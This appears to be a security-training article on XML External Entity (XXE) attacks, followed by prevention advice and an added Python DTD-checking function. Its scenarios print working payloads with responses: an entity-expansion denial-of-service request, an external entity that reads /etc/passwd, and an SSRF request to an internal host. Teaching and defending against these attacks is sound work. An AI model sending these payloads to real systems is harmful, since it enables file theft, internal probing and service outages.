
XML Entity Expansion

  1. XML Entity Expansion
    1. Description
    2. Impact
    3. Scenarios
      1. Denial of Service Attacks
      2. Server-Side Request Forgery Attacks
    4. Prevention
    5. Testing

Description

XML External Entity Expansion (also referred to as XXE) attacks are used against applications that process XML input by exploiting XML external entity support. By supplying hostile XML input containing a specification of an external entity to a weakly configured XML parser, attackers may be able to view files on the application server filesystem, conduct denial-of-service attacks, and interact with any external or backend systems to which the application has access.

XXE vulnerabilities arise because the widely used XML format (commonly used to exchange data between the browser and the server) supports several features, such as external entities, that become dangerous when a parser has them enabled while processing untrusted input. Due to the potential severity of XXE attacks and their ongoing prevalence, these attacks make an appearance on the OWASP Top 10 list of web application security risks.

As with many of the vulnerabilities on this list, prevalence would markedly decrease with more comprehensive and continuously updated developer training.

Impact

XXE attacks can include conducting denial-of-service attacks and disclosing local files containing sensitive data such as passwords or private user data. As the attack occurs relative to the application processing the XML document, it can enable attackers to laterally traverse to other internal systems to potentially stage Server-Side Request Forgery (SSRF) attacks against unprotected internal services.

XML attacks have been understood for almost 20 years, and yet even in recent years, powerhouses like Google and Facebook are known to have faced issues with these types of attacks. This serves as a stark reminder that chaos can occur (and take the form of potentially massive fines) simply due to misconfiguration and poorly implemented code.

Scenarios

The main features of XML that are relevant to understanding XXE vulnerabilities are XML entities and Document Type Definitions (DTDs).

XML entities are a way of representing an item of data within an XML document by reference instead of writing the data itself. Predefined entities such as &lt; and &gt;, which represent the characters < and > respectively, are built into the XML language. New entities can be defined in a Document Type Definition.

Document Type Definition (DTD) defines the structure of an XML document, and it is usually used for validation. It can be embedded at the start of an XML document by using the optional DOCTYPE element. External DTDs can be loaded from a remote URL.

Denial of Service Attacks

XML entities can be abused to cause denial-of-service attacks by nesting entity references within entity references within entity references: each level multiplies the amount of text the parser must produce, so a small input can exhaust the XML parser's memory. The so-called Billion Laughs attack shown below declares a DTD whose root element is called foo and an entity called bar, replaced, in this case, with the name of a fine security training platform! Anytime &bar; is referenced, the XML parser replaces it with SecureFlag; t1 references bar twice, t2 references t1 four times, and t3 references t2 five times, so the single reference &t3; in the body expands to 40 copies.

Request

POST http://www.vulnerableapp.com/xml HTTP/1.1

<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar "SecureFlag ">
  <!ENTITY t1 "&bar;&bar;">
  <!ENTITY t2 "&t1;&t1;&t1;&t1;">
  <!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
  Join &t3;
</foo>

Response

HTTP/1.0 200 OK
 
Join SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag

Server-Side Request Forgery Attacks

DTDs and XML external entities can also be leveraged to trick an application into reading local files from the server's filesystem and returning their contents in the response.

Request

POST http://www.vulnerableapp.com/xml HTTP/1.1

<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "file:///etc/passwd">
]>
<foo>
  &xxe;
</foo>

Response

HTTP/1.0 200 OK
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh 
(...)

An attacker could perform a Server-Side Request Forgery attack, pointing the URI to an external resource, such as an HTTP location. This, in turn, can be used to pivot and interact with any external or backend systems to which the application has access.

Request

POST http://www.vulnerableapp.com/xml HTTP/1.1

<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "http://internal.vulnerableapp.com:8443">
]>
<foo>
  &xxe;
</foo>

Response

HTTP/1.0 200 OK
 
(... result of the request to http://internal.vulnerableapp.com:8443 ...)

Prevention

Disabling Document Type Definition (DTD) processing entirely in the XML parser effectively prevents most of these attacks.

When possible, handling data using simpler formats like JSON is recommended. For almost a decade, JSON has been seen as preferable to XML due to its lightweight syntax and simpler design.

Of course, exceptions exist to prove rules, and in cases where it is absolutely not possible to switch off DTDs within the business parameters, nor to use another format, developers must apply the following measures.

When the entire XML document is transmitted from an untrusted client, it’s not usually possible to selectively validate or escape tainted data within the system identifier in the DTD. Therefore, the XML processor should be configured to use a local static DTD and disallow any declared DTD included in the XML document.
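As an added example that is not part of the original article, the following Python function (built on the standard library's expat bindings; the name check_dtd, the default limit and the policy are my own choices) applies the controls above before any entity is expanded: it rejects an external DTD and any SYSTEM/PUBLIC entity outright, and estimates the expansion size of each internal entity from the declarations alone, so a Billion Laughs payload like the one in the Scenarios section is refused without the parser ever materialising the text.

```python
import re
import xml.parsers.expat as expat
ENTITY_REF = re.compile(r"&([A-Za-z_:][\w.:-]*);")

class UnsafeXML(ValueError):
    """The inline DTD violates the parsing policy."""

def check_dtd(doc, max_expansion=10_000, allow_dtd=True):
    """Reject an external DTD, SYSTEM/PUBLIC entities, recursive entities and any
    internal entity expanding past max_expansion chars; returns {entity: size}."""
    declared, sizes = {}, {}  # general entity -> literal text / expanded size

    def start_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_dtd:
            raise UnsafeXML("DOCTYPE is not permitted")
        if sysid or pubid:  # DTD to be fetched from a URL or file
            raise UnsafeXML(f"external DTD rejected: {sysid or pubid}")

    def entity_decl(name, is_pe, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:
            raise UnsafeXML(f"external entity {name!r} rejected: {sysid or pubid}")
        if not is_pe:
            declared[name] = value or ""

    def expanded_size(name, chain=()):
        if name in chain:
            raise UnsafeXML(f"recursive entity {name!r}")
        if name not in sizes:
            text = declared[name]
            total = len(ENTITY_REF.sub("", text))  # literal characters ...
            for ref in ENTITY_REF.findall(text):   # ... plus nested references
                if ref in declared:
                    total += expanded_size(ref, chain + (name,))
            sizes[name] = total
        return sizes[name]

    def end_doctype():  # runs before any content, so nothing is ever expanded
        for name in declared:
            if expanded_size(name) > max_expansion:
                raise UnsafeXML(f"entity {name!r} expands to {sizes[name]} chars")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.EndDoctypeDeclHandler = end_doctype
    parser.Parse(doc, True)  # handler exceptions propagate out of Parse
    return sizes

# Constructed sample, copied from the Billion Laughs request in the Scenarios section.
BILLION_LAUGHS = """<?xml version="1.0"?><!DOCTYPE foo [ <!ELEMENT foo ANY>
<!ENTITY bar "SecureFlag "> <!ENTITY t1 "&bar;&bar;"> <!ENTITY t2 "&t1;&t1;&t1;&t1;">
<!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;"> ]><foo>Join &t3;</foo>"""
```

The size check bounds each declared entity; references in the document body add only linearly to that, which is the amplification limit that matters for this attack.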

Testing

Verify that the application restricts its XML parsers to the most restrictive configuration possible, and that unsafe features, such as resolving external entities and processing inline DTDs, are disabled to prevent XML External Entity (XXE) attacks.
